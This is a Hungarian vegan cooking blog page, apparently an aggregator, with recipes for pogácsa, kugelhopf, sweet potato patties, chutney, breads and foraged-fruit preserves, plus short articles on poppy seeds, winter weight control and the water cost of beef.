Ma délután babatalálkozós édesburgonya (batáta) partira voltunk hivatalosak a barátainkhoz… hogy miért pont édesburgonya a parti témája, annak hosszú története van, de a lényeg, hogy sikerült végre magyar, ásotthalmi édesburgonyát vennem. Valójában ez egy burgonyás pogácsa, csak tettem hozzá egy darab édesburgonyát is, ami szépen megszínezte sárgára (igen, a szín nem tojástól van). Természetesen elkészíthető csak burgonyából is, nem kötelező édesburgonyát tenni bele.
Még soha nem sütöttem vegán pogácsát, de úgy érzem, hogy első alkalomnak kiváló volt ez az indulás. Mindig idegenkedtem a “margarin” használatától, de aztán rájöttem, hogy most már vannak igen jó minőségű margarinok – erről beszél Tóth Gábor élelmiszeripari mérnök is ebben a cikkben -, plusz vannak olyanok, akik laktózérzékenységük miatt bármennyire is szeretnék, nem fogyaszthatnak vajat. Egyébként ebbe a pogácsába csak egy kevés bio margarin (nem génkezelt alapanyagokból készült, nem hidrogénezett!) került, mert nem volt itthon több, a maradék zsiradékot puha kókuszzsírral váltottam ki. Finom, puha pogácsákat kapunk végeredményül, amely a háromszori hajtogatásnak köszönhető. Szóval idő mire elkészül a pogácsa, viszont nagy munkát nem igényel, és a végeredmény magáért fog beszélni.
Ádi is rájárt, bár ő inkább kikapott egyet, harapott belőle, visszarakta, majd kivett egy másikat, abból is harapott egy falatkát…
Vegán (édes)burgonyás pogácsa
Hozzávalók:
- 500 g burgonya + édesburgonya (egy közepes darab), meghámozva, felkockázva
- 500 g simaliszt
- 250 g jó minőségű margarin / kókuszzsír, szobahőmérsékletű
- 1 tasak (7-9 g) szárított élesztő
- 125 ml langyos rizstej + egy kevés a kenéshez
- só
Tegyük egy lábasba a burgonyát + édesburgonyát, öntsük fel vízzel és főzzük puhára. Szűrjük le, majd törjük pépesre burgonyatörővel.
Öntsük egy bögrébe a langyos rizstejet, adjuk hozzá az élesztőt, keverjük el és hagyjuk felfutni 4-5 perc alatt.
Tegyük egy tálba az összetört burgonyát, adjuk hozzá a lisztet, a puha margarint/kókuszzsírt, a felfutott élesztőt, majd sózzuk ízlés szerint. Gyúrjuk össze a tésztát, majd takarjuk le egy konyharuhával és hagyjuk 45 percet kelni. Lisztezett deszkán nyújtsuk ki fél centiméter vastagra, majd a négy oldalát középre hajtva hajtogassuk össze. Tegyük rá a konyharuhát és hagyjuk kelni 15-20 percet. Nyújtsuk ki, majd megint hajtogassuk össze… ezt ismételjük összesen még kétszer. Az utolsó nyújtásnál szintén fél centiméter vastagra hagyjuk a tésztát, késsel rácsozzuk be a tetejét. Szaggassunk pogácsákat belőle, tegyük sütőpapírral bélelt tepsire és kenjük meg a tetejüket rizstejjel.
Süssük 180C fokon kb. 20 percig, amíg aranybarnák lesznek.
Tojás- és tejmentes csokis-kókuszos keksz
2014. november 14. Éltető ételek
Ez a keksz finomabb, mint a "Jó reggelt". Gyorsan elkészül, tojásmentes, és akár karácsonyi keksz is lehet belőle. Hozzávalók: - 10 dkg aprószemű zabpehely - 10 dkg teljeskiőrlésű tönkölyliszt - 10 dkg vaj vagy valódi kókuszolaj - 5 dkg méz - 5 dkg kókuszreszelék - 1 evőkanál cocomas kókuszkrém - 2-3 csepp narancsolaj - 5 dkg csokireszelék - csipet só Elkészítése: - A vajat morzsoljuk el a liszttel, majd adjuk hozzá a többi hozzávalót is. - Csak annyi kókuszkrém kell hozzá, hogy kellően gyúrható, nem folyékony masszát kapjunk. - Nyújtsuk ki 2-3 mm vastagra, és szaggassuk ki kedvenc formánkkal. - Előmelegített sütőben 180 fokon süssük meg kb. 15 perc alatt.
Narancsos sütőtökös diós kuglóf : glutén-, tojás-, és laktóz mentes édesség
2014. november 14. Zöld Avocado
Már évek óta megvan a kuglóf sütő formám, de még sosem használtam. Valahogy nem vonzottak az agyon cukrozott kuglóf receptek, de azért rendszeresen töprengtem rajta, mit is készíthetnék vele, ha már ott van a konyhaszekrényben?! :-) Pár napja mikor a kedvenc gasztroblogjaim nézegettem, megláttam egy minden mentes kuglófot, ami a kép és a hozzávalók alapján is megtetszett. Azonnal tudtam, hogy valami ilyesmit fogok készíteni! ;-) narancsos sütőtökös diós kuglóf Sütőtök szezon van, és nagyon szeretjük ezt az őszi-téli narancssárga vitamin bombát. (Valójában Balázs régen egyáltalán nem szerette, de egyszer megkóstolta, és azóta ő sem tud nemet mondani neki.) Telis tele van B2, B11 és C-vitaminnal. Jelentős a karotin, kalcium, cink, mangán és réz tartalma. Kálium tartalmának köszönhetően pedig elősegíti a vér tisztítását. Általában önmagában esszük, a szeleteket sütőben aranybarnára sütve, de mostanában kísérletezem vele, mint alapanyag is. Féltem, hogy elviszi az ételek, sütemények ízét, és nagyon erőteljes lesz, de egyáltalán nem így van. Talán azért voltak előítéleteim, mert akárhányszor a sütőtök szót kimondom, az orromban érzem azt a nem kellemes bébi étel szagot, ami a sütőtök-répa pépes üvegcsékből jön ki, miután kinyitjuk. Emlékeztek rá? Nektek sem egy kellemes szagélmény, ugye?! ;-) Na ezt az agyamban elraktározott kellemetlen szagot kell félre tennem ilyenkor, és bátran nekivágni a sütésnek. Megéri! Mennyei sütőtökös süteményeket lehet készíteni, kellemetlen illat és íz élmény nélkül. Próbáljátok ki, és írjátok meg a ti tapasztalataitokat sütőtök témában! ;-) Narancsos sütőtökös diós kuglóf (glutén, tojás, és laktóz mentes édesség) narancsos sütőtökös diós kuglóf HOZZÁVALÓK 18 cm-es kuglóf formához : - 100g köles liszt - 100g barna rizsliszt - 50g hajdina liszt - 20g lenmagliszt - csipet Himalája só - 1tk. szódabikarbóna - 60g nyírfa cukor vagy nádcukor (ha nagyon édes szájú vagy, mehet bele több is, de vegyük figyelembe, hogy a sütőtök is édes) - téli fűszerek: 1 késhegynyi őrölt szegfűszeg, 1 kk őrölt szerecsendió, 1 kk őrölt gyömbér - 300 g sütőtök lereszelve, héj nélkül (vagy a dupla késes darabolóval felaprítva) - 50g kókuszzsír - 2 ek. olívaolaj - 50 ml növényi tej (pl.:mandula tej) - 1 nagyobb narancs (kb.200 ml leturmixolva a gyümölcs húsával együtt) - 1 kk. étkezési ecet - 1-2 marék dió, pekán dió, mogyoró mix A sütés nem az erősségem. Míg a főzéshez, a főételekhez használt receptjeim nagy része saját kútfőből származik, a desszertekhez más kreatív konyhatündérek ötleteit kell segítségül hívnom. ;-) Ezesetben az alap mindenmentes kuglóf recept Nóri mindenmentes konyhájából származik. Én ezt módosítottam, és készítettem belőle egy sütőtökös narancsos diós kuglófot, a télies ízek kedvelőinek. :-) ELKÉSZÍTÉS: A lisztekhez úgy jutottam hozzá, hogy a gabonákat (köles, barna rizs, világos hajdina, lenmag) ledaráltam a kávédarálón. Legközelebb azonban kész por liszteket fogok venni, és azt teszem a tésztába, mert a házi darálás nem eredményez olyan finom szemcséket, így a kuglóf tésztája sem lesz olyan homogén. Persze attól, hogy a kész kuglóf tészta morzsásabb, még ízre tökéletes, és nem kellett sokat várnia rá, hogy elfogyjon. ;-) A liszteket összekeverjük a sóval, szódabikarbónával, a porcukorrá darált nádcukorral vagy nyírfacukorral, és a téli fűszerekkel (gyömbér, szegfűszeg, szerecsendió). Külön tálban egyneművé keverjük a felolvasztott kókuszolajat, az olívaolajat, a növényi tejjel, a leturmixolt naranccsal és az ecettel. A tetszés szerinti dió féléket összetörjük apró darabkákra, a sütőtököt pedig hámozás és mosás után lereszeljük a nagy lyukú reszelőn. A száraz és nedves összetevőket a sütőtökkel és diókkal együtt összedolgozzuk egynemű tésztává. A kuglóf formánkat kikenjük kókuszzsírral, és körbehintjük rizsliszttel, hogy a tészta ne ragadjon a formába. Beleöntjük a tésztánkat, és előmelegített sütőben 160 °C fokon kb.30 perc alatt készre sütjük. Isteni narancsos fűszeres illatok jelzik majd a kuglóf elkészültét. Miután kész van, kitesszük a formával együtt hűlni. Ha még melegen akarjuk eltávolítani a formából, szét fog esni a tésztánk. Adjunk neki egy kis időt, bármennyire is nehéz megállni, hogy ne essünk neki a süteménynek. ;-) Tálalhatjuk önmagában, vagy narancsos öntettel is: narancs, banán és egy kevés növényi tej összeturmixolva krémes állagúra. Bűntudat nélküli nassolást kívánok a hideg téli napokra ezzel a mennyei narancsos-sütőtökös kuglóffal! ;-) narancsos sütőtökös diós kuglóf Megjegyzés: az én kuglóf formában nagyobb, mint 18 cm átmérőjű, így a tésztám elveszik benne, ezért nem tökéletes a készre sült forma a képeken. Ha nektek is 18 cm-es a formátok, akkor a tészta "tetőtől talpig" fog érni a formában .
Szezámmagos édesburgonya ropogós
2014. november 13. Gréta konyhája
Ez a fasírt annyira ellenállhatatlan, hogy ha egyszer megkóstoljátok mindig ezt szeretnétek enni. A héten készítettem édesburgonya salátát, édesburgonya ropogóst, és indiai lencse sabji-t édesburgonyával, szóval nálam az új hagyma, az édesburgonya:)) Sokszor készítettem már batáta fasírtot, de muszáj valamit változtatnom rajta minden egyes alkalommal, ami az adott napi hangulatomtól, a hűtőtartalomtól, vagy a friss, otthon található fűszereimtől függ. A legjobb mégis az, hogy mindenhez passzol, főzelékfeltétként, magában joghurtos szósszal, szendvicsben, vagy burgerként is megállja a helyét. Íme a legújabb édesburgonyaőrületem eredménye: Hozzávalók: 3 db közepes friss édesburgonya 4 evőkanál csicseriborsó liszt 2 púpozott evőkanál magkeverékes Glutenix (gluténmnetes kenyérliszt keverék bioboltban, vagy élelmiszer allergia szaküzletben mindig kapható) 1 ek szezámmag 2 gerezd fokhagyma 1 szál apróra vágott póréhagyma, vagy újhagyma tiszta só, bors, vegamix, 2 tk garam masala 1 mk kurkuma 1 tk curry fűszerkeverék 1 tk grill fűszerkeverék (Na glutamát mentes) Sós vízben félkeményre főzzük az édesburgonyát, majd ha kihűlt lehúzzuk a héját, és egy nagy lyukú sajtreszelőn egy tálba reszeljük. Hozzáadjuk a liszteket, fűszereket, a préselt fokhagymát, hagymát, szezámmagot, alaposan masszává dolgozzuk, fél órára hűtőbe tesszük, kezünkkel rusztikus pogácsákat formázunk, és kevés olívaolajban két oldalát aranybarnára sütjük. Jó étvágyat!
Banáncsatni
2014. november 11. Vegán muflon
A villanypásztor, a kampósbot és a parittya abban különbözik a csatnitól, hogy ugyan nem finom, de definiálni sem kell feltétlenül. Szóval hogy közérthetőség szempontjából utóbbit is leredukáljam a villanypásztor, a kampósbot és a parittya szintjére: a csatni egy több funkcióval bíró indiai különlegesség. Fogyasztható magában desszertként, de akár öntetként is. (Édes jellegű pakorához kiváltképp ajánlott.) Sőt, bomlott elméjűek hastáncolhatnak is neki. Bármi is legyen a célunk vele, következzék a metódus: Alkotóelemek: 4-5 db banán 1,5 dl szójajoghurt (lelketlenebbek 120g tehéntúrót is használhatnak helyette) 2 kiskanál cukor 1/2 citrom leve 1 kiskanál őrölt fahéj 1 kiskanál római kömény vagy garam masala 1 kiskanál korriander 1 kiskanál ánizs (elhagyható) 1 kiskanál őrölt pirospaprika kevés feketebors 2-3 kiskanál erős chilipaprika (igen, kell bele ennyi, ne legyünk nyámnyila tacskóhuszárok!) Elkészítése: a banánt összenyomkodunk, majd szenilis nagymama módjára mindent mindennel összekeverünk. Vizualice:
Mák jótékony hatásai
2014. november 9. Éltető ételek
A mákos ételeknek a magyar konyhában nagy hagyománya van, szerintem mindenki evett már mákos kalácsot, bejglit, rétest, mákos gubát vagy éppen mákos kiflit. Persze a mák (kizárólag a magja) nemcsak egy élelmiszer alapanyag, hanem egyben gyógynövény is. Azt szerintem sokan tudják, hogy a mákolajat csontritkulás megelőzésére ajánlják, valamint a gubójából opiumot állítanak elő. Nos, a mák ennél sokkal többet jelent. Nézzük meg, hogy miért is kerüljön a tányérunkra rendszeresen mák? Mák egyenlő ópium? A mák a boglárkavirágúak rendjébe tartozik, azon belül a mákfélék családjába. (Ide tartozik pl. a pipacs és a vérrehulló fecskefű is). A mák virágzásakor a csészelevelek lehullanak, a magház gubóterméssé képződik, melybe a sok kis mákszem rejtőzik. A mák virágainak a színét tekintve láthatunk fehér, rózsaszínű vagy éppen lila színűeket is. A szentesi fehér mák (tájfajta) hasonló a kék mákhoz, de magtermése szép fehér, és finom dióíze van. A fehér (lilás foltos) virágúaknak magjuk kék színű, tokjuk nagy alkaloidatartalmú. Egy kormányrendelet értelmében ma csak a rózsaszín virágú Ametiszt fajta vethető, más színű fajták termesztését a magasabb alkaloidtartalmuk miatt tiltják. A mák ma már az egész világon elterjedt, őshazája azonban Közép-Ázsia (Törökország, Pakisztán, irán, Kína, India). Elsősorban, mint élelmiszert termesztik, de mellékterméke a mákgubó is rendkívül fontos, mert a gyógyszeripar kiemelkedő alapanyaga. Ez többféle ópiumalkaloidát tartalmaz, melyek közül talán a morfin és a kodein a legismertebb. Hazánkban Kabay János (1896-1936) magyar gyógyszerész felfedezése nyomán (1931) az üres, értéktelen máktokból állíttották elő a morfint és származékait. Ez a találmánya forradalmasította a morfingyártást, s ezáltal a gyógyszergyár még exportra is tudott előállítani ebből az értékes kábító fájdalomcsillapítóból. A XX.században évi sok ezer tonnányi üres mákgubót Tiszavasváriban, a Kabay által létesített Alkaloida Vegyészeti Gyárban dolgozták fel. Még propaganda is épült ennek kapcsán: egyetlen darabja se vesszen felhasználatlanul! Gyűjtéséből az iskolák úttörőcsapatai is kiveszik a részüket. A mák értékes tápanyagai A gubóval ellentétben a mák fogyasztása teljesen ártalmatlan, sőt tápanyagokban gazdag, értékes fehérjéket tartalmaz. A vitaminok közül értékes B1-, B5-, B6-, niacinforrás. Az ásványi anyagok közül pedig nagyobb mennyiségben kálciumot (968 mg/100g), foszfort (800 mg/100g) cinket, mangánt, rezet, vasat (15mg/100g), káliumot és magnéziumot (506 mg/100g) tartalmaz. Ezenkívül értékes telítetlen zsírsavakban, 72% linolsavat (omega-6 zsírsav), 11% olajsavat és palmitinsavat tartalmaz. A mák az erős körmökért, hajért és a csontokért Mivel a mák omega3-6 aránya nem megfelelő, ezért tartós, nagy mennyiségű fogyasztása akár gyulladást is okozhat. Az, hogy a csontritkulás ellen napi 1 evőkanál mákolajat ajánlanak több hónapig vagy akár évekig, ezzel egyáltalán nem értek egyet. Akkor mit tehetünk csontritkulás esetén? Nyugodtan együnk mákot (ne mákolajat) akár heti 3-4x is. Mindig azt mondom, hogy egy ételt tápegészként fogyasszuk, tehát ne vonjunk ki belőle semmit és ne is adjunk hozzá semmit. A mákolaj egy koncentrált étel, melyből kivontuk a rostokat és sok egyéb dolgokat. Amennyiben mégis mákolajat szeretnénk fogyasztani, akkor azt csak kúraszerűen javaslom (2-3 hét, utána ugyanennyi szünet), vagy őrölt szezámmaggal együtt akár naponta is fogyaszthatjuk. 1 evőkanál őrölt szezámmagra 5-6 csepp mákolajat cseppentsünk, valamint naponta fogyasszunk zöld leveleket (zöld turmixot) és algákat. Persze a csontritkulás megelőzésénél nemcsak kalciumra van szükság, hanem sok egyéb más anyag együttállására is (pl. D- és K vitamin, magnézium, foszfor, mangán, stb.) A mákolaj levegővel érintkezve gyorsan avasodik, ezért erre figyeljünk oda, hogy a kupakot jól zárjuk vissza, és tartsuk hűtőben! Egyéb jótékony hatásai A máknak nyugtató hatása van, így az idegrendszerre jótékony hatással bír. Régen a gubóból főztek teát, és ezt itatták a csecsemőkkel, hogy ne sírjanak (így tudtak dolgozni az anyák). Ezt ma már semmiképp ne tegyük meg! Ezenkívül, mint apró magocska a bélfal tisztításában is segítségünkre lehet, kíméletesen kisepri a bélfalra tapadt lerakódásokat. Az olaját használhatjuk bőrápolásra, vagy a magocskákból bőrradír is készülhet. Mákunk van... a konyhában Amennyiben nyersen szeretnénk fogyasztani, akkor ebben az esetben is javaslom az áztatását az enzimgátlók miatt. Ha főzésre, sütésre kerül a sor, akkor ennek már nincs jelentősége. A nyers ételek esetében készíthetünk máktejet, de édességek alapanyaga is lehet. A mákos tészta nyers változata az, amikor répát reszelünk le tésztának, vagy aszalt gyümölcslapot vágunk fel vékony csíkokra. A Kolláth reggeli vagy a kedvenc kásánk alapanyaga is lehet. Reggeli turmixunkba is belekerülhet. Úgyhogy mákra fel, mert nemcsak finom, de egészséges is! Anikó
Olivás cipó
Mostanában ezt a kenyeret szoktam elkészíteni hol olivásan, hol köményesen. Napokig puha marad, ha bebugyoláljuk egy konyharuhába. Szeletelhető, pirítható. Hozzávalók: 2 bögre tönkölyliszt 1 bögre finomszemű zabpehely 1 bögre rétesliszt 1 kávéskanál só 1 csomag instant élesztő 4 ek. olivaolaj 1 bögre langyos víz 2 marék szeletelt,zöld olivabogyó 1. A száraz hozzávalókat (lisztek, zabpehely, só, élesztő) összekeverjük, majd az olajat is elkeverjük benne. Végül jöhet a langyos víz, és jól összegyúrjuk a tésztát. Ha nagyon ragadna, tehetünk hozzá még egy kis tönkölylisztet. 2. Az összegyúrt kenyér tésztát betakarva félre tesszük egy órára kelni. 3. Egy óra elteltével jól gyúrjuk át a tésztát, hozzáadva a szeletelt olivát is. Hideg sütőbe téve (a sütő melegedése közben is kel a tészta) kb. 30 perc alatt 180-200 fokon enyhén barnára, készre sütjük. Süthetjük formában is, de tepsibe téve tetszőleges formát adhatunk neki (csavart/kerek cipó). Én ezúttal kerek cipóvá formálva sütöttem ki. Ani Tisztán, tudatosan!
Ez elment vadászni...
"Ez elment (vadászni) gyűjteni, ez (meglőtte) leszedte, ez hazavitte, ez megsütötte, és ez az icike-picike mind megette" ... miután a Szárnyalj, és a felhők között nem érhet baj Pankája lefényképezte! Nincs szebb látvány az őszi erdőnél. A hanyatló természet színorgiájának élményét magunkba szívhatjuk egy-egy séta, túra során. Lesz miből töltekezni tavaszig! Nem csak a szemünket lakathatjuk jól az őszi erdőben, a bokrok vitaminokban gazdag bogyókat kínálnak. Fontos szabály, hogy a forgalmas országúttól legalább egy kilométerrel beljebb gyűjtsünk, valamint érdemes előre tájékozódni, az egyes növények mikor érettek be a gyűjtésre és mely részük alkalmas a spájzolásra. Ha nincs megfelelő növényismeretünk, akkor olyan emberek társaságában tegyük meg első túráinkat, akiktől biztos információk szerezhetők be és pontosan meg tudják különböztetni az ehető növényeket a mérgező hasonmásuktól. Lelkes természetjáró csapatunk szeptemberben somot, októberben kökényt és csipkebogyót gyűjtött, melyek a téli hónapokban fontos C vitamin forrásai lehetnek szervezetünknek, javítva ellenálló képességét. A gyümölcsöket szedés után aszaltuk, így kiváló gyógytea alapanyagokká váltak, de befőtt, lekvár és szörp is készíthető belőlük. Ötletadó receptjeinkkel megmutatjuk, három deci sombefőtt is magában hordozhatja egy könnyed, pikáns vacsora ígéretét, ami a konyhánkban valósággá válhat. fotó: Szegedi Annamari Pikáns som befőtt: - 1 kg érett húsos som - 50 dkg cukor - 1 liter víz - 1-2 g citromsav vagy borkősav Sterilizált üvegekbe töltsük a leszárazott, megmosott somot. ( Rázogassuk az üveget közben, hogy minél több férjen bele. ) A vízből és cukorból készítsünk szirupot, majd öntsük a gyümölccsel megrakott üvegekbe. ( Ne öntsük színültig, mert a gyümölcs is enged levet. ) A lezárt üvegeket állítsuk be egy nagyobb lábosba vízfürdőbe és forraljuk 8-10 percig, majd hagyjuk őket kihűlni. A citromsav/borkősavra nem tartósítás céljából, hanem a befőtt szép piros színének megőrzéséhez szükséges, így akár el is hagyható. *** A húsos som 3-7 méter magasra növő cserje. Még a lombosodást megelőzően nyíló sárga virágai nem csak a tavasz első hírnökei, hanem dísze is a kertnek. Augusztus-szeptember környékén érő gyümölcsei 1,5-3 centiméter nagyságúak lehetnek, hosszúkás szilvára emlékeztető, általában élénkpiros, savanykás, pikáns ízű. Kökényes körte lekvár: - 1 kg dér csípte kökény - 1 kg lédús Vilmos körte - fél citrom leve - egy kis darab frissen reszelt gyömbér - ízlés szerint cukor ( kb. 30 dkg ) A kökényt alaposan megmossuk, majd kevés vízben a citromlével és a gyömbérrel együtt 15 perc alatt puhára főzzük. Egy nagyobb lyukú szitán átpasszírozzuk, majd a megpucolt és apróra vágott körtével újra főzni kezdjük, a végén a cukrot is hozzáadjuk. Romantikus színű, izgalmas ízvilágú lekvárt kapunk ebből a kökény körte párosból. *** A kökény apró, kékesfekete, hamvas, csonthéjas. Szeptember-októberben érik. Éretlen termésének húsa erősen fanyar ízű. Akkor érdemes gyűjteni a gyümölcsöt, amikor a dér már megcsípte, ekkorra megpuhul, fanyarságából veszít és enyhe édes íze lesz. Javaslat: ha a kökényt még nem csípte meg a dér, akkor érdemes a megmosott szemeket a lekvárfőzés előtt 24 órára a fagyasztóba tenni. fotó: Szegedi Annamari Grillezett zeller sommártással: - 1 zeller gumó - fél deci olívaolaj - 1-2 gerezd fokhagyma - só, citrombors - 1 üveg som vagy kökény befőtt - 1 ek. kukoricakeményítő A zellert megtisztítjuk és kb. ujjnyi szeletekre vágjuk. Elkészítjük az ízesített olajat, majd bepácoljuk vele a zellerszeleteket. A sütőben 200 fokon, grillfokozaton megsütjük őket. Aki kalóriadúsabb vacsorára vágyik, készíthet mellé burgonyapürét is. A sombefőttet egy lábosba öntjük és a befőtt léből kiveszünk pár evőkanállal, amibe simára keverjük a kukoricakeményítőt. Felmelegítjük a befőttet és belecsurgatjuk a keményítős keveréket. Krémes mártást kapunk, melyet tálaláskor a forró zellerszeletekre öntünk. fotó: Szegedi Annamari Mákos scone, avagy az angolok édes pogácsája: - 1/2 csésze teljes kiőrlésű tönkölyliszt - 1/2 csésze fehér tönkölyliszt - 1/2 csésze darált mák - 7.5 dkg vaj - csipet só - 1 tk. szódabikarbóna - 1/2 csésze kimagozott som befőtt - 1/2 csésze joghurt - 1/2 csésze tej A szilárd összetevőket egy tálba összekeverjük, majd elmorzsoljuk benne a vajat. Egy mélyedést alakítunk ki a közepében, amibe beleöntjük a joghurtot, tejet és a kimagozott somot, majd óvatos mozdulatokkal összedolgozzuk a tésztát. Egy nokedli masszánál nem sokkal sűrűbb tésztát kapunk, amit vastagon lisztezett deszkára borítsunk és a tetejét is lisztezzük meg. Formázzuk 3 cm magas téglatestté, majd daraboljuk fel egyenlő részekre ( 9 vagy 12 felé szoktam ). Egy sütőpapírral bélelt tepsibe rakjuk át őket óvatosan ( kissé lágy a tészta, de így lesz finom a végtermék ). A tetejét kenjük meg felvert tojással és szórjuk meg egész mákszemekkel, majd előmelegített sütőbe süssük 175 fokon 20-25 percig. *** A scone egy eredetileg skót sütőporos zsemlye, ami ma már nagyon divatos az angoloknál ötórai tea mellé, de mi nyugodtan tálalhatjuk frissen felvert tejszínnel és a kökényes-körte lekvárral hideg téli reggeleken csipkebogyó tea társaságában.
Diós-lenmagos toast kenyér
A dió igen fontos táplálék az emberiség számára. Érdemes rendszeressé tenni étrendünkben. Néhány jó tulajdonsága, ami miatt nem érdemes nélkülözni: Telítetlen zsírsavakat tartalmaz, képes normalizálni a koleszterin szintet. Omega-3 és antioxidáns tartalma segíti a vérerek rugalmasan tartását, a szívet védi, vérserkentő hatással bír. Emésztést serkentő, valamint bélféregűző tulajdonsága is van. Jelentős kálium, kalcium, foszfor, vas és B-vitamin (B1, B3) E-vitamin tartalma van.
A recept:
Hozzávalók:
- 2,7 dkg friss élesztő
- 3,5 dl meleg víz
- 20 dkg teljes kiőrlésű liszt
- 35 dkg fehér liszt (BL-55)
- 8 dkg finomra darált lenmag
- 2 evőkanál olaj
- 1 dkg só
- 1 kisebb bögre durvára tört dió
Elkészítés:
A kenyérsütő üstjébe belemorzsoljuk az élesztőt, majd ráöntjük a meleg vizet.
[Sokak szerint kell hozzá valami édes dolog is. Mint például egy kiskanál méz, vagy biocsicsóka. Régen én is raktam az élesztőre mézet, vagy biocsicsókát, azonban láttam egy rövidebb filmet (Ízes hagyományok), ahol falusi asszonyok sütöttek kenyeret, és legfeljebb sót adtak az élesztőhöz és a vízhez, de cukrot semmiféleképpen nem. Azóta édesítő nélkül készítem a kenyeret.]
Várunk egy rövid ideig, míg az élesztő feloldódik a víz tetejére. Ha cukrot, vagy mézet is raktunk hozzá, akkor az élesztő a víz felszínére kel. Nálam ennek hiányában csak feloldódik.
Közben elővesszük a többi hozzávalót.
Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is.
Beletesszük a kenyérsütő gépbe és kiválasztjuk azt a programot, amivel a tésztát összekeveri, megdagasztja, megkeleszti. Nekem "dough" a program neve, és másfél óra alatt a nyers tészta szép nagyra fel is dagad.
Előveszünk egy kenyérformát, sütőpapírral kibéleljük. A megkelt tésztát belehelyezzük.
Konyharuhával letakarjuk és kb. fél órát pihentetjük meleg helyen. (Ez el is hagyható, ha előbb szeretnénk kész lenni vele.) A tészta tetejére diószemeket szúrunk.
Sütőbe tesszük - közepes lángon, vagy 180 fokon megsütjük. Kb. 35 perc sütés után egy kevés vízzel a tetejét megkenjük, majd visszatesszük 10 percre. Így puha, de mégis ropogós lesz és a teteje is szebb színt kap.
Ha kihűlt, már fogyaszthatjuk is. Akár magában, vagy valamilyen pástétommal megkenve.
Sütőtökös szabdzsi
2014. október 30. Lét-tudatos konyha
Jó pár sütőtök várakozik a veremben, ezért több olyan ételt is szeretnék készíteni a közeljövőben, amelyhez alapanyagként szükséges. Elsőre kicsit tartottam attól, hogy az alábbi ételben az édes íz fog érvényesülni, de nem így lett. Az eredeti recepten változtattam egy kicsit, feljavítottam egy kis krumplival. Köretként rizs, valamint kiegészítésként puri és zöldparadicsomcsatni készült hozzá. Hozzávalók: 1 kg sütőtök és burgonya (nálam az arány: 65 dkg sütőtök és 35 dkg krumpli) 2 dl darabos paradicsomszósz 2 ek olaj 1 mk római kömény 1/2 mk kurkuma 1/4 mk hing (asafoetida) víz Elkészítése: A sütőtököt és a krumplit megtisztítom és feldarabolom. Az olajon megpirítom először a római köményt, majd hozzáadom a darabokra vágott zöldséget és a többi fűszert. Kevés vizet öntök alá, majd párolom kb. 20 percig. Beleöntöm a paradicsomszószt és fedő alatt puhára főzöm. Ha elfő a leve, akkor vízzel pótolom. Forrás : Tiszta ízek szakácskönyv
11+1 tipp, hogy ne hízz el télen
2014. október 27. Gréta konyhája
Még csak ősz van, tehát van mit tennünk a téli hízás ellen. Télen általában minden ember alatt többet nyom a mérleg, hiszen a természet rendje, hogy a hideg időben zsírpárnákat halmozunk fel, amely tavasszal egyszerűen leolvad rólunk. Ideális esetben itt 1-3 kg plusz feleslegről van szó, amely teljesen normális, ez nálam is így történik, évről évre ezért nem kell aggódnunk. Viszont ha ezt használjuk kifogásnak, hogy többet és többet ehessünk, nassoljunk, és legyintünk, hogy nem baj, ha kicsivel több is felcsúszik, könnyen abba hibába eshetünk, hogy mire kivirágoznak a fák, tetemesebb súlyfelesleggel kell szembenéznünk, amelynek nemcsak esztétikai, hanem egészségkárosító hatásai is lehetnek. Hogy ne márciusban kapkodjunk, és szenvedjünk a bikini-alakért, van egy pár egyszerű tippem, a téli extra túlsúly elkerülése érdekében, nálam bevált. 1. Egyél annyit, mint nyáron 2. Jó, ha nem márciustól, hanem októbertől kezdesz a nyári alakért tenni. mozogj minden nap intenzíven 20 percet. Ha nincs időd kimozdulni, tervezd meg az otthoni aktivitást, nekem pl ez minden reggel min 20 perc jóga vagy Pilates, és este lefekvés előtt 10 perc hasizom gyakorlat. Nagyszerű videókat találsz a You Tube-on, pl Fitnessblender 3. A téli korán sötétedős begubódzós időszakban nassolj inkább aszalt gyümölcsöket, vagy magvakat, a chipset, ropit, kekszeket, és a fagyit, hagyd a boltok polcain 4. Főzz otthon sok-sok zöldségből gabonából, vagy ebédelj a Tündérkonyhában 5. Egyél sok céklát, zellert, édesburgonyát, spenótot, kelbimbót, káposzta féléket, mert ezek a zöldségek segítenek megtartani a súlyodat. Ideális ha nyersen eszed, persze sütőben sütve is szuper 6. Egyél még több salátát, nyers gyümölcsöt (alma, körte, szilva) 7. Ebédre egyél annyi szénhidrátot amennyit akarsz, de estére már ne. Ha nem bírsz salátát enni, készíts mindenféle zöldségből fűszeres hasábokat sütőben, és készíts hozzá növényi mártogatóst. Lehet avokádó krém, szójajoghurt mentával, hummus, veganéz, akármi, amit imádsz. Nem kell éhezni...nem szabad éhezni! 8. Tegyél ki egy általad csinos, inspiráló nőt a hűtőre, vagy te is lehetsz a képen, szuper formában. 9. Válts most életmódot, nem kell megvárni a tavaszt. Kezdetben cseréld le a fehér lisztet tönkölyre, vagy a fehér cukrot nádcukorra, vagy bármilyen természetes édesítőre. 10. Légy VEGÁN, mert jobb neked is, az állatoknak és a földnek is, mellesleg évszaktól függően segít elérned az ideális testsúlyt. Ha nem hiszel benne, próbáld ki, a másik oldalt már ismered. +1. Keress 30 napos húsmentes, vagy vegán kihívásokat az interneten, és így többedmagaddal, irányítva-segítve tudsz áttérni erre a testet-lelket tisztító tudatos életmódra. Nekem megváltoztatta az egész életem
A víz
2014. október 26. Vegan Spirit
Az embereknek szükségük van vízre. Háborúzni is képesek érte, mint minden másért, pedig van más megoldás.
Egy adag marhahús előállítása rengeteg édesvizet igényel. Közel 100szor annyit, mint egy adag, magas fehérje tartalmú gabonáé! Ennek egyszerűen az az oka, hogy az állatok rengeteg takarmányt elfogyasztanak, mire megölik őket a húsukért. Az elfogyasztott takarmány nagy része pedig csak a létfenntartást szolgálja. Nagyon kevés alakul át hússá. Ezen kívül az állat maga is fogyaszt vizet, mégpedig nem elhanyagloható mennyiséget. Egy szarvasmarha átlagos víz igénye, külső hőmérséklettől és fajtától függően 50-100 liter/nap!
